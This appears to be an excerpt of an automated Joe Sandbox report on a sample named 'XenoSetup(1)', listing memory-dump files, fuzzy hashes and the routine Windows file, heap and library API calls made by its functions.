                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$FileHandleRead
                                                                                      • String ID:
                                                                                      • API String ID: 2244327787-0
                                                                                      • Opcode ID: 839618ddbdc7d895e5c43b3dd8b10d3940d83308075c9fad6bb7a054c301664b
                                                                                      • Instruction ID: b936a1c19d5e05aefd543f491796681844afd0951192ee958e97ded0daee9b10
                                                                                      • Opcode Fuzzy Hash: 839618ddbdc7d895e5c43b3dd8b10d3940d83308075c9fad6bb7a054c301664b
                                                                                      • Instruction Fuzzy Hash: EE118231D18244EBDF319E67C8046693BA9FB42370F50862AF45685190D7F99F48FB71
                                                                                      APIs
                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00FED710,00000000,00000000,?,0100ACDB,00FED710,00000000,00000000,00000000,?,0100AED8,00000006,FlsSetValue), ref: 0100AD66
                                                                                      • GetLastError.KERNEL32(?,0100ACDB,00FED710,00000000,00000000,00000000,?,0100AED8,00000006,FlsSetValue,01017970,FlsSetValue,00000000,00000364,?,010098B7), ref: 0100AD72
                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0100ACDB,00FED710,00000000,00000000,00000000,?,0100AED8,00000006,FlsSetValue,01017970,FlsSetValue,00000000), ref: 0100AD80
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad$ErrorLast
                                                                                      • String ID:
                                                                                      • API String ID: 3177248105-0
                                                                                      • Opcode ID: 2b26d449f24d263e889abc4adf462319ef33ab2555ec2f405eb0dfbc276b4186
                                                                                      • Instruction ID: 8cb673b87282b33fe621dd4181023893c6c9736096c12e3f9dfc56be5f86ea49
                                                                                      • Opcode Fuzzy Hash: 2b26d449f24d263e889abc4adf462319ef33ab2555ec2f405eb0dfbc276b4186
                                                                                      • Instruction Fuzzy Hash: 3001D436711322EBE773A96CAC44A9B7F98AF056B2B110625F987D7184DB2AD401C7E0
                                                                                      APIs
                                                                                      • GetStdHandle.KERNEL32(000000F5,?,?,?,?,00FED343,00000001,?,?,?,00000000,00FF551D,?,?,?), ref: 00FE9F9E
                                                                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,00FF551D,?,?,?,?,?,00FF4FC7,?), ref: 00FE9FE5
                                                                                      • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,00FED343,00000001,?,?), ref: 00FEA011
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: FileWrite$Handle
                                                                                      • String ID:
                                                                                      • API String ID: 4209713984-0
                                                                                      • Opcode ID: b2e8781b2804806faf738dba20f9ed44be4b1bd42925e9a272995b6f7ba946f2
                                                                                      • Instruction ID: 4fdbd9254f0cd597cab6d7fc1b51ddbf732ffb20ab990709b86d93d21d38ee6b
                                                                                      • Opcode Fuzzy Hash: b2e8781b2804806faf738dba20f9ed44be4b1bd42925e9a272995b6f7ba946f2
                                                                                      • Instruction Fuzzy Hash: D631E732608385AFDB14CF21D818B6E77A5FFC4721F04451DF5819B290C7B9AD48DBA2
                                                                                      APIs
                                                                                        • Part of subcall function 00FEC27E: _wcslen.LIBCMT ref: 00FEC284
                                                                                      • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00FEA175,?,00000001,00000000,?,?), ref: 00FEA2D9
                                                                                      • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00FEA175,?,00000001,00000000,?,?), ref: 00FEA30C
                                                                                      • GetLastError.KERNEL32(?,?,?,?,00FEA175,?,00000001,00000000,?,?), ref: 00FEA329
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateDirectory$ErrorLast_wcslen
                                                                                      • String ID:
                                                                                      • API String ID: 2260680371-0
                                                                                      • Opcode ID: 0cf7fd9ee2b7b3c978c8bf7c7d30edb8a4bcb6e42bc5861a499abc9468fd999d
                                                                                      • Instruction ID: 55053be64603885b77395f68d7b50c17c5cfea0a165432434161e910b39d285e
                                                                                      • Opcode Fuzzy Hash: 0cf7fd9ee2b7b3c978c8bf7c7d30edb8a4bcb6e42bc5861a499abc9468fd999d
                                                                                      • Instruction Fuzzy Hash: 0701FC31900294AEEF32AA774C09BFD3388AF0A7A0F044455F941E6085D75EE981F7B3
                                                                                      APIs
                                                                                      • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0100B8B8
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: Info
                                                                                      • String ID:
                                                                                      • API String ID: 1807457897-3916222277
                                                                                      • Opcode ID: 492f3c51afeef4ed7469aa95bfc755b31ef7e82d0c4845012d7bd1f0146571db
                                                                                      • Instruction ID: c5c45332e81fc9f01acf976be4f9dcc0753eb91a840bdbeddcbfd1f86bd29f4d
                                                                                      • Opcode Fuzzy Hash: 492f3c51afeef4ed7469aa95bfc755b31ef7e82d0c4845012d7bd1f0146571db
                                                                                      • Instruction Fuzzy Hash: BF41C67450438C9EEB238E688C84BFABBE9EB55304F1804EDD5DA87182D235AA45CF61
                                                                                      APIs
                                                                                      • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,?), ref: 0100AFDD
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: String
                                                                                      • String ID: LCMapStringEx
                                                                                      • API String ID: 2568140703-3893581201
                                                                                      • Opcode ID: b4144c814141512c6ecfe042d753cad0aaa77edbda4e7026d21f01cdc53567b6
                                                                                      • Instruction ID: cd3bc7dcbaa36e9d2d09094de91f7ccdf46c607221b704eebc993cfc4c475b59
                                                                                      • Opcode Fuzzy Hash: b4144c814141512c6ecfe042d753cad0aaa77edbda4e7026d21f01cdc53567b6
                                                                                      • Instruction Fuzzy Hash: 8301D33260020EBBDF12AF91DC05DEE7F62FF48760F454158FE546A1A0CA7A8931EB90
                                                                                      APIs
                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,0100A56F), ref: 0100AF55
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: CountCriticalInitializeSectionSpin
                                                                                      • String ID: InitializeCriticalSectionEx
                                                                                      • API String ID: 2593887523-3084827643
                                                                                      • Opcode ID: 1bacfa7e4f5a6f18ca5eb0d71350df2ff3498f904877d20a2403ff1d9636b228
                                                                                      • Instruction ID: a6f5ae335dc448c3767d46b936d17d2ff7ab4c039ed15c716f4309b9efccbb5f
                                                                                      • Opcode Fuzzy Hash: 1bacfa7e4f5a6f18ca5eb0d71350df2ff3498f904877d20a2403ff1d9636b228
                                                                                      • Instruction Fuzzy Hash: 0CF0B43168120CFBDB125F55CC05CAE7F61EF44721F404068FE485F264DA7A4A149785
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: Alloc
                                                                                      • String ID: FlsAlloc
                                                                                      • API String ID: 2773662609-671089009
                                                                                      • Opcode ID: 32767769a4262987aef03ce85fdcc4f5ffc69f15291d78889a7c9bcfd3495f61
                                                                                      • Instruction ID: 8a7b34139b75dff19ff79819f764409c5f2eddf1ce4892e55c38bb7718c19528
                                                                                      • Opcode Fuzzy Hash: 32767769a4262987aef03ce85fdcc4f5ffc69f15291d78889a7c9bcfd3495f61
                                                                                      • Instruction Fuzzy Hash: 5CE05530780318BBE212BB26CC06D6EBB95EF54720F0100A9FD829F240CD7D4A0183C4
                                                                                      APIs
                                                                                        • Part of subcall function 0100B7BB: GetOEMCP.KERNEL32(00000000,?,?,0100BA44,?), ref: 0100B7E6
                                                                                      • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0100BA89,?,00000000), ref: 0100BC64
                                                                                      • GetCPInfo.KERNEL32(00000000,0100BA89,?,?,?,0100BA89,?,00000000), ref: 0100BC77
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: CodeInfoPageValid
                                                                                      • String ID:
                                                                                      • API String ID: 546120528-0
                                                                                      • Opcode ID: c94e881a09b77559eec9d39bce88058bea74e3114e1d9ba06d67f6b30f173fee
                                                                                      • Instruction ID: 77cdc278f7ff55d4afe66a6af4dd466101cd861f7885d4a2d2a690e9a6681565
                                                                                      • Opcode Fuzzy Hash: c94e881a09b77559eec9d39bce88058bea74e3114e1d9ba06d67f6b30f173fee
                                                                                      • Instruction Fuzzy Hash: DA5137789002499EF7229F39C480AFAFBE5EF41210F1844AED5D68B2D1EB399545CB91
                                                                                      APIs
                                                                                      • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00FE9A50,?,?,00000000,?,?,00FE8CBC,?), ref: 00FE9BAB
                                                                                      • GetLastError.KERNEL32(?,00000000,00FE8411,-00009570,00000000,000007F3), ref: 00FE9BB6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorFileLastPointer
                                                                                      • String ID:
                                                                                      • API String ID: 2976181284-0
                                                                                      • Opcode ID: be5fa076aba0a8252ffc9c171b39bbac3f88e548bcfb1b8b207eaff1ec24b566
                                                                                      • Instruction ID: d523f62341e4bd9e628c7dbfacdb94a05325220aa686ffe61171eff1569b54fb
                                                                                      • Opcode Fuzzy Hash: be5fa076aba0a8252ffc9c171b39bbac3f88e548bcfb1b8b207eaff1ec24b566
                                                                                      • Instruction Fuzzy Hash: 1D41DF31A08381CFDB24DF16E58456AB7E6FFD4720F148A2DE89183261D7F4AE44AB71
                                                                                      APIs
                                                                                        • Part of subcall function 010097E5: GetLastError.KERNEL32(?,01021030,01004674,01021030,?,?,01003F73,00000050,?,01021030,00000200), ref: 010097E9
                                                                                        • Part of subcall function 010097E5: _free.LIBCMT ref: 0100981C
                                                                                        • Part of subcall function 010097E5: SetLastError.KERNEL32(00000000,?,01021030,00000200), ref: 0100985D
                                                                                        • Part of subcall function 010097E5: _abort.LIBCMT ref: 01009863
                                                                                        • Part of subcall function 0100BB4E: _abort.LIBCMT ref: 0100BB80
                                                                                        • Part of subcall function 0100BB4E: _free.LIBCMT ref: 0100BBB4
                                                                                        • Part of subcall function 0100B7BB: GetOEMCP.KERNEL32(00000000,?,?,0100BA44,?), ref: 0100B7E6
                                                                                      • _free.LIBCMT ref: 0100BA9F
                                                                                      • _free.LIBCMT ref: 0100BAD5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: _free$ErrorLast_abort
                                                                                      • String ID:
                                                                                      • API String ID: 2991157371-0
                                                                                      • Opcode ID: 755762f0d96872171d3ca873661471accb4afadff4c772cf2ee88559365b28fa
                                                                                      • Instruction ID: 0afcf61fcfdc810ec2f3c0b29c15f4e3d85dacf29dbec09b0454d379745a57fc
                                                                                      • Opcode Fuzzy Hash: 755762f0d96872171d3ca873661471accb4afadff4c772cf2ee88559365b28fa
                                                                                      • Instruction Fuzzy Hash: 3231B63590420AAFFB13EFA8D440BAD7BF5EF41325F25409AD9849B2D2EB765D80CB50
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 00FE1E55
                                                                                        • Part of subcall function 00FE3BBA: __EH_prolog.LIBCMT ref: 00FE3BBF
                                                                                      • _wcslen.LIBCMT ref: 00FE1EFD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: H_prolog$_wcslen
                                                                                      • String ID:
                                                                                      • API String ID: 2838827086-0
                                                                                      • Opcode ID: e7456fb09f10007c8ce2afdb7f02f20cb0a88635baa3e427b2a7042be96a318e
                                                                                      • Instruction ID: 0a81fecfce278a8a224b87d11e9a7cafea89916becb5b5f7e37c6b9c75b43d56
                                                                                      • Opcode Fuzzy Hash: e7456fb09f10007c8ce2afdb7f02f20cb0a88635baa3e427b2a7042be96a318e
                                                                                      • Instruction Fuzzy Hash: 0E314B71D042899FCF11DF9AC945AEEBBF6BF58310F100069F485A7291C7365E10EB60
                                                                                      APIs
                                                                                      • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00FE73BC,?,?,?,00000000), ref: 00FE9DBC
                                                                                      • SetFileTime.KERNELBASE(?,?,?,?), ref: 00FE9E70
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: File$BuffersFlushTime
                                                                                      • String ID:
                                                                                      • API String ID: 1392018926-0
                                                                                      • Opcode ID: 44c1a59713be9a8f793a43d1074c62622b8407bb5e6a4aaac3241ce3b1e57d79
                                                                                      • Instruction ID: 6da6c618382f4469f93a9f05bd69ac5dc48d433ffc2297af5e1bd50aeac8ad58
                                                                                      • Opcode Fuzzy Hash: 44c1a59713be9a8f793a43d1074c62622b8407bb5e6a4aaac3241ce3b1e57d79
                                                                                      • Instruction Fuzzy Hash: 3921F03264C295EBC724CE36C891AABBBE4AF91314F08491CF4C587141D369E90DAB72
                                                                                      APIs
                                                                                      • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00FE9F27,?,?,00FE771A), ref: 00FE96E6
                                                                                      • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00FE9F27,?,?,00FE771A), ref: 00FE9716
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateFile
                                                                                      • String ID:
                                                                                      • API String ID: 823142352-0
                                                                                      • Opcode ID: fe5cbfaabf662cf417e2138f0c1df1ad2604d18324610991182b50f6a63035f7
                                                                                      • Instruction ID: f21144affdea23e78232a3e5f6805901024ff4ed4376c9aeb1417c827e899092
                                                                                      • Opcode Fuzzy Hash: fe5cbfaabf662cf417e2138f0c1df1ad2604d18324610991182b50f6a63035f7
                                                                                      • Instruction Fuzzy Hash: 052190715083846EE3309A66CC89BB777DCEB49334F100A1AFAD5C65D1C7B8A884A671
                                                                                      APIs
                                                                                      • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00FE9EC7
                                                                                      • GetLastError.KERNEL32 ref: 00FE9ED4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorFileLastPointer
                                                                                      • String ID:
                                                                                      • API String ID: 2976181284-0
                                                                                      • Opcode ID: a92f919bdc9d434f5aa26a0631addd5c80ecb69f8f223fe1919c9fda505bb8b8
                                                                                      • Instruction ID: f52e73effb44ac0ef0e78d1d6bcdebad5490e46927e5730541cd9507551b3207
                                                                                      • Opcode Fuzzy Hash: a92f919bdc9d434f5aa26a0631addd5c80ecb69f8f223fe1919c9fda505bb8b8
                                                                                      • Instruction Fuzzy Hash: 0611E531A04784ABD734C62ACC80BA6B7E9AB44370F504A29F652D26D0D7F4ED45E770
                                                                                      APIs
                                                                                      • _free.LIBCMT ref: 01008E75
                                                                                        • Part of subcall function 01008E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0100CA2C,00000000,?,01006CBE,?,00000008,?,010091E0,?,?,?), ref: 01008E38
                                                                                      • HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,01021098,00FE17CE,?,?,00000007,?,?,?,00FE13D6,?,00000000), ref: 01008EB1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
